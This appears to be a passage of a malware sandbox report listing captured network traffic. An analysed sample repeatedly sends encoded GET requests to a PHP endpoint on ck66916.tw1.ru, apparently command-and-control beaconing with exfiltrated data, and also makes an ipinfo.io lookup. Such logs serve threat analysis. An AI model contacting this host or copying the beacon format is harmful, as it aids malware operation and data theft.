NTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=d1nIRZWa0IjYwJFWklGbtNGMOhVYFZVbjhGZIRWb5ITVjhnVZBjRHJFdG12YulTbjFFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJhmWqlFaxMUT0klaOJTUE1Ua05GT5IERNdXQE10dBRUT1VkaMdHND10NKl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUdkNjY1RXbiZlSp9UaBZ1UPZURUl2dpl0QkVUSwkUaPlGMVF1UKNETpRjMkZXNyEWdWxWS2k0QiNnRyQGbKhVYHp0QMlWSYp1a1clWtZ1RSdWTzQmdS1mYwRGbJZTS5NWMKhVYyw2RkVnRrl0cJlWUIpVRXJTSp9Ua0IjYw5kbjxmWxUFUstWUpdXaJlXUE9EeFpWT4VkaNlHND5kMJtGTwkkaNVTSE90dJpGTXJERNVXRE1UejZFVXpUaPlWVXJGa1ATVQx2aRl2dplUMFRlT1kFVPdXQU1EMFpWTwUlaNVTSp9UaRV1UrpEWZZnStNGbodEZ2FzaJNXSpF1TSpHVDZVVNhkUU5UavpWS5ZVbjFjUzkFaadFZ1Z0VUtmSYlldK12Ysh2RkZXMrl0cJNkTUZFRWhlTq5UN0ADVp9maJxWMXl1TS12YolTbZlnVHFGM5cFVpdXaJhXSYp1c4JjY5JlbiZnTwIGbSdVYXpUaPlWUXNFbOdVYyY1RSZlQxIVa3lWS2gWRJBTWqlkNJNlWwYUbV9mTYpVeadlWThGWZ5kVGVFSKNETp1kbjZHeyImaClmT1kkeOJzaE5UNJRkTndGSJBTSE1EeBNUZnFERPlXRqlkNJlmY2x2RkdHbtNmaOhlWFZ1RaZXMwIGbSdVYXZlRVhkSDxUaJBjUnVkaJZTSTVWe5clYsFDMixmUXF2VWZUVIp0QMlWVxMFUotmTQpUaPlWSzImeOhlWqlTbjFVOXp1as1mVWJUMSl2dplUMJl2TpVVbjFjUzkFbShVYv5UbjJUOXp1as1mVWJUMSl2dplURWVkUH5ERTRDMrlkNJNlW0ZUbUZlQxIVa3lWSxkERNRTQE9kQspXTGpUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJhXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTV